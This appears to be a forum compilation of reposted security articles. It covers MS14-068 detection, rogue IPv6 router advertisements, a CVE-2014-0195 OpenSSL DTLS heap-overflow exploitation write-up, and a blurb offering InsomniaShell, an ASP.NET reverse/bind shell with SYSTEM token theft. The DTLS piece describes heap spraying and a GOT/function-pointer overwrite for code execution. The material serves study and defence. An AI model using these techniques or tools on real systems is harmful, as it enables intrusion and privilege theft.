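            groups = set(group_membership.get(ev["user"], []))
            if not groups & ADMIN_GROUPS:
                flagged.append(ev["user"])
    return flagged

# Fabricated events: a legitimate DA logon and the forged-TGT logon
events = [{"id": 4672, "user": "adminguy"},
          {"id": 4672, "user": "darthsidious"},
          {"id": 4624, "user": "darthsidious"}]
membership = {"adminguy": ["Domain Admins"],
              "darthsidious": ["Domain Users"]}
print(suspicious_4672(events, membership))  # → ['darthsidious']
```

The point is the cross-check: with MS14-068 the 4672 event fires for an account whose real AD group membership would never justify it, and that mismatch is the detection signal.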
References:
MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)
Mimikatz and Active Directory Kerberos Attacks
MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum
Kerberos Vulnerability in MS14-068 Explained
MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege
The Python script MS14-068 POC code: Python Kerberos Exploitation Kit (PyKEK)
Benjamin Delpy's blog (Google Translate English translated version)
Mimikatz GitHub repository
Mimikatz GitHub wiki
Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014)
All Mimikatz Presentation resources on blog.gentilkiwi.com

Sursa: Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)
-
Why You Must Use ICMPv6 Router Advertisements (RAs)
Posted on June 16, 2014 - 05:14:52 PM by Scott Hogg

When a dual-protocol host joins a network it sends an ICMPv6 (type 133) Router Solicitation (RS) message to inquire about the local IPv6-capable router on the network. The local router is tuned into ff02::2 (the all-routers multicast group address) and will receive the RS message. In response to the RS, the router immediately sends an ICMPv6 (type 134) Router Advertisement (RA) message to all nodes on the network (ff02::1, the all-nodes multicast group address). The router also sends RA messages periodically (typically every 200 seconds) to keep the nodes informed of any changes to the addressing information for the LAN. The RA message contains important information for nodes, including which method they should use to obtain their IPv6 address. The RA contains several flags that the nodes watch for and use:

A-bit – Autonomous Address Autoconfiguration Flag: tells the node it should perform stateless address assignment (SLAAC, RFC 4862)
L-bit – On-Link Flag: tells the node that the prefix listed in the RA is on the local link
M-bit – Managed Address Config Flag: tells the host it should use stateful DHCPv6 (RFC 3315) to acquire its address and other DHCPv6 options
O-bit – Other Config Flag: tells the host that there is other information the router can provide (such as DNS information defined in Stateless DHCPv6, RFC 3736)

ICMPv6 RAs are intended to help facilitate bootstrapping the connectivity of an IPv6 node on a network. They tell the hosts on the LAN how they should go about acquiring their global unicast IPv6 address and becoming productive members of the network. The RA also provides the end-node information about the local router and its ability to be the default gateway. This process is well documented in Section 4 of IETF RFC 4861, "Neighbor Discovery for IP version 6 (IPv6)".
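The flag bits above live in the RA header (M and O) and in its Prefix Information option (L and A), per RFC 4861. A small Python sketch of how a host might decode them:

```python
def decode_ra_flags(ra_flags, prefix_flags):
    """Decode the RA flag bits a host inspects (RFC 4861):
    RA header byte: M (managed, 0x80), O (other config, 0x40);
    Prefix Information option byte: L (on-link, 0x80), A (SLAAC, 0x40)."""
    return {
        "M": bool(ra_flags & 0x80),
        "O": bool(ra_flags & 0x40),
        "L": bool(prefix_flags & 0x80),
        "A": bool(prefix_flags & 0x40),
    }

# A typical SLAAC-only network: M=0, O=0, L=1, A=1
print(decode_ra_flags(0x00, 0xC0))
# → {'M': False, 'O': False, 'L': True, 'A': True}
```

Setting M=1 instead (RA flags byte 0x80) is how the router steers hosts toward stateful DHCPv6.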
Unfortunately, there are some security risks related to ICMPv6 RA messages. On networks that do not yet use IPv6, the dual-stack hosts sit dormant waiting for an eventual RA message to awaken their IPv6 connectivity. An attacker can craft a “rogue RA” message on these networks, get the dual-protocol nodes on the network to configure their IPv6 addresses and utilize the attacker’s system as their default gateway. The attacker can then easily perform a Man-In-The-Middle (MITM) attack without the user’s knowledge using this technique. This issue is documented in RFC 6104 “Rogue IPv6 Router Advertisement Problem Statement”. On networks that already have IPv6 running, rogue RAs can destabilize the network (and still perform a MITM attack). Rogue RA messages can be easily generated with The Hacker’s Choice IPv6 Attack Toolkit, Scapy, SI6 Networks IPv6 Toolkit, Nmap, and Evil FOCA, among other tools and methods. There are methods to detect and block these rogue RA messages. Utilities like NDPMon, Ramond, 6MoN, and others can be used to look for suspicious Neighbor Discovery Protocol (NDP) packets and detect invalid RA messages. These tools function much like the old ARPWATCH program did for detecting ARP attacks on an IPv4 LAN. There is a technique called “RA Guard” that can be implemented in an Ethernet switch to permit legitimate RAs from a valid router and block the malicious rogue RA messages. This technique is documented in IETF RFC 6105 “IPv6 Router Advertisement Guard”. There is also a very new RFC 7113 “Implementation Advice for IPv6 Router Advertisement Guard (RA-Guard)”. A good example of improved first hop security (FHS) in IPv6 can be implemented in Cisco switches. Unfortunately, there are also methods to avoid any rogue RA detection accomplished by NDP security methods. Finding the ICMPv6 layer-4 header information could be made difficult by forcing the system to fully parse the IPv6 header structure. 
An attacker can change the location of the RA in the IPv6 packet by using extension headers to avoid detection especially if security tools do not parse the entire RA message. If an end-node receives an RA with a hop-by-hop extension header or an atomic fragment, the host disregards the header but still processes the RA normally. This rogue RA attack is called “RA guard evasion”. Legitimate RA messages should not include fragmentation or other headers. There is some additional guidance along these lines documented in RFC 6980 “Security Implications of IPv6 Fragmentation with IPv6 Neighbor Discovery”. There are other beneficial uses of ICMPv6 RA messages on a LAN. Another method of getting DNS information to IPv6 nodes is to leverage options within the RA to send the DNS server and domain search list. Nodes that receive the RA can simply parse these options and get this DNS information and use it with their SLAAC auto-generated IPv6 addresses. IETF RFC 6106 "IPv6 Router Advertisement Options for DNS Configuration" defines the Recursive DNS Server (RDNSS) and DNS Search List (DNSSL) options within Router Advertisement (RA). One of the challenges with RDNSS is getting support for it natively in the host operating systems. This link provides some information on which OSs support this option. There is also a RDNSS deamon for Linux (rdnssd). Even if you intend to use DHCPv6 instead of SLAAC in your environment, you still need RA messages to function on the local LAN. The RAs provide the default gateway information to an end node and, with the M-bit, inform the nodes that the LAN uses stateful DHCPv6. DHCPv6 does not currently have an option to provide this information to the DHCPv6 client in the same way it is provided with DHCP for IPv4. Providing the default gateway as a DHCPv6 option was proposed, but never made it into the standards. 
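The RDNSS option is simple enough to parse by hand. Here is a hedged Python sketch of the RFC 6106 layout (type 25, length in units of 8 octets, 2 reserved bytes, a 4-byte lifetime, then one or more 16-byte server addresses); the helper name is mine:

```python
import ipaddress
import struct

def parse_rdnss(opt):
    """Parse an RDNSS option (RFC 6106, type 25): after type and length
    come 2 reserved bytes, a 4-byte lifetime, then 16-byte addresses.
    Length is in 8-octet units, so address count = (length - 1) // 2."""
    opt_type, opt_len = opt[0], opt[1]
    assert opt_type == 25, "not an RDNSS option"
    (lifetime,) = struct.unpack_from("!I", opt, 4)
    n_addrs = (opt_len - 1) // 2
    addrs = [str(ipaddress.IPv6Address(opt[8 + i * 16: 24 + i * 16]))
             for i in range(n_addrs)]
    return lifetime, addrs

# Build a sample option advertising 2001:db8::53 with a 1800 s lifetime
dns = ipaddress.IPv6Address("2001:db8::53").packed
opt = bytes([25, 3]) + b"\x00\x00" + struct.pack("!I", 1800) + dns
print(parse_rdnss(opt))  # → (1800, ['2001:db8::53'])
```

A host that understands this option can populate its resolver configuration directly from the RA, with no DHCPv6 exchange at all.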
DHCPv6 may be desirable in the desktop access portions of an enterprise network, and DHCPv6 is absolutely essential in a service provider's subscriber access networks. However, organizations may not need DHCPv6 in a data center environment. Most organizations will prefer to statically configure IPv6 address parameters on specific systems in the network environment. Static address configuration may be preferred for systems that need to have a fixed, non-changing IPv6 address or for nodes that are unable to perform dynamic address assignment. The systems that will most likely use this static IPv6 addressing technique are servers and systems within data center environments. These servers could be on internally-accessible networks, private/hybrid cloud infrastructures, or Internet publicly-accessible networks. Any system that is going to have its address used in some form of firewall policy or access-control list will need a static address. Servers within a data center environment would need to be configured with the following information to operate correctly in an IPv6 environment:

Static IPv6 address for its network interface: this address would be allocated from the IPAM system and registered within the DNS system with an AAAA resource record and an accompanying PTR record.
Static IPv6 default gateway: this could be either the global unicast address of the first-hop router or the link-local address of the first-hop router (e.g. FE80::1).
Static DNS server: this is the caching DNS resolver the system will use when it needs to perform DNS queries (e.g. configured within /etc/resolv.conf).
DNS domain name: this is the domain name the system will use in combination with the server's hostname to create its fully-qualified domain name (FQDN) (e.g. the domain suffix search order list).

Typically, servers will have a static IPv6 address assigned, but they will still use the information contained in the ICMPv6 (type 134) Router Advertisement (RA) message sent by the first-hop router to learn information about the default gateway. RA messages contain the link-local address and the layer-2 (MAC) address of the first-hop router. Servers can listen to these and use this information to auto-configure their default gateway. If you want to disable sending of RA messages on a Cisco IOS router, you can use the following commands to accomplish this goal.

interface GigabitEthernet 0/12
 ipv6 address 2001:db8:1234:5678::1/64
 ipv6 nd prefix no-autoconfig
 ipv6 nd suppress-ra
 ipv6 nd ra suppress all

It is important to realize how important the ICMPv6 RA message is to the function of an IPv6-enabled LAN. Security risks exist, but the attacker must be on-net or have compromised a node on the network to be able to perform these rogue RA MITM attacks. Most enterprise organizations would prefer DHCPv6 for desktop LANs, but RAs are still needed on these networks. In a data center, an organization may want to statically assign the address details to hosts and not use RA messages. Regardless, people should not fear the RAs and should learn to embrace them.

Sursa: https://community.infoblox.com/blogs/2014/06/16/why-you-must-use-icmpv6-router-advertisements-ras
-
CVE-2014-0195: Adventures in OpenSSL's DTLS Fragmented Land
By Mark Yason
December 8, 2014

Earlier this year, details of a remote code execution bug in OpenSSL's DTLS implementation were published. The following is a look at the bug, its process and the different ways attackers might leverage it for exploitation:

Vulnerability

On a high level, the bug allows writing past the end of a heap-allocated buffer, so application data or heap metadata can be overwritten. This leads to application crashes or, at worst, remote code execution. The bug is due to the way the OpenSSL DTLS parser handles fragmented handshake messages. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message. Consider the following fragmented ClientHello message that triggers the bug:

When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data "A" (fragment offset = 0, fragment length = 1) is written to the message buffer:

Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length are checked to determine whether they are within the range of the message length:

Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data "B" (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer:

As you may have observed, the bug is interesting in that an attacker has relatively high control of where (fragment offset), what (fragment data) and how much data (fragment length) can be written.

Triggering

Now that we have an idea of what the bug is, let's try to trigger it.
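The flawed bounds check is easy to model before touching a live server. The sketch below is a toy Python reconstruction of the logic described above, not OpenSSL code: the buffer is sized from the first fragment's message length, but each later fragment is range-checked against its own msg_len field, so a lying second fragment slips past the check:

```python
def reassemble(fragments):
    """Toy model of the flawed DTLS reassembly. Each fragment carries its
    own msg_len, frag_off, frag_len and data, mirroring the real header."""
    buf = bytearray(fragments[0]["msg_len"])  # sized from the FIRST fragment
    for frag in fragments:
        # flawed check: uses the CURRENT fragment's msg_len, not len(buf)
        if frag["frag_off"] + frag["frag_len"] > frag["msg_len"]:
            raise ValueError("fragment out of range")
        end = frag["frag_off"] + frag["frag_len"]
        if end > len(buf):  # in C there is no such guard: the heap is hit
            return (f"out-of-bounds write of {end - len(buf)} byte(s) "
                    f"past a {len(buf)}-byte buffer")
        buf[frag["frag_off"]:end] = frag["data"]
    return bytes(buf)

frags = [
    {"msg_len": 2, "frag_off": 0, "frag_len": 1, "data": b"A"},
    {"msg_len": 3, "frag_off": 2, "frag_len": 1, "data": b"B"},  # lies
]
print(reassemble(frags))
```

In the real parser the last guard does not exist, so fragment "B" is written one byte past the 2-byte allocation; here the model just reports the overflow it would have caused.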
For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory. Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1“; this causes the OpenSSL tool to listen on Port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught: The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()). DTLS Exploitation After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This will serve as a great learning experience because it will teach us how attackers think, what their process is and what other weakness they might use to fully leverage the bug. For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS. Once a target service is running, the next step involves attaching to the process, setting breakpoints to the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. 
Understanding the allocations that occur after the message buffer allocation allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk) and are therefore targeted for overwrite. After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug into a fairly limited "write arbitrary data to the address pointed to by pointers found in the process" exploit primitive:

In the context of DTLS, pitem is a linked-list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure:

The hm_fragment structure contains information about the fragmented handshake message state and, more importantly, the message buffer pointer (hm_fragment.fragment). Every time a handshake fragment is parsed, the related pitem of the handshake is retrieved, pitem.data is cast to a hm_fragment*, and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment:

Therefore, using the bug to point pitem.data somewhere in the process address space so that pitem.(hm_fragment*)data->fragment is aligned to a pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points to. To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset +0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure.
Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer: We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting: WriteN Primitive Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141: As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive: Execution (RIP) Control Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000): Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point at. 
An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd: In turn, that pointer points somewhere in the writable .data section of libc: Looking at the data near stderr in the libc, we can see that stderr+0x18 is an interesting function pointer — which is actually a function pointer dereferenced by malloc() when requesting additional memory from the system: Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved: Conclusion After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug. Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again. In the end, an attacker’s persistence is what transforms software bugs into working reliable exploits, and as software developers, it is good to always keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products. Sursa: CVE-2014-0195: Adventures in OpenSSL's DTLS Fragmented Land
-
InsomniaShell – ASP.NET Reverse Shell Or Bind Shell

InsomniaShell is a tool for use during penetration tests, when you have the ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell.

ASP.NET is an open source server-side Web application framework designed for Web development to produce dynamic Web pages. It was developed by Microsoft to allow programmers to build dynamic web sites, web applications and web services. It was first released in January 2002 with version 1.0 of the .NET Framework, and is the successor to Microsoft's Active Server Pages (ASP) technology. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language.

A bind shell binds a command prompt to a listening port on the compromised machine, while a reverse shell sends a command prompt back to a listening port on the attacker's machine (used when the hacked server doesn't have a public IP). InsomniaShell has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. If the provided page is running on a server with a local SQL Server instance, the shell includes functionality for a named pipe impersonation attack. This requires knowledge of the sa password, and results in the theft of the token that the SQL Server service is executing under.

You can download InsomniaShell here: InsomniaShell.zip

Sursa: InsomniaShell - ASP.NET Reverse Shell Or Bind Shell - Darknet - The Darkside